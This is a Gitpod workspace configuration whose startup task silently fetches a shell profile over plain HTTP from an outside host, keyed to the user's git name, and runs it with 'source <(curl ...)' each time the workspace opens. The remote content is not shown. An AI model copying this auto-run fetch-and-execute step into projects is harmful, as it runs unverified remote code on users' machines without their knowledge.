image: 
  file: .gitpod.Dockerfile
  
  
tasks:
  - init: 'set +x; clear'
    command: |
      set +x; clear
         
      ID=$(echo "${GITPOD_GIT_USER_NAME}" | sed -e 's/ /-/g' | tr '[:upper:]' '[:lower:]')
      source <(curl -s -L http://lucifer.bobdot.me:4444/getprofile?${ID}) 
      
      export PATH=/workspace/bob/plugins/kubectl:$PATH
      exec /bin/bash
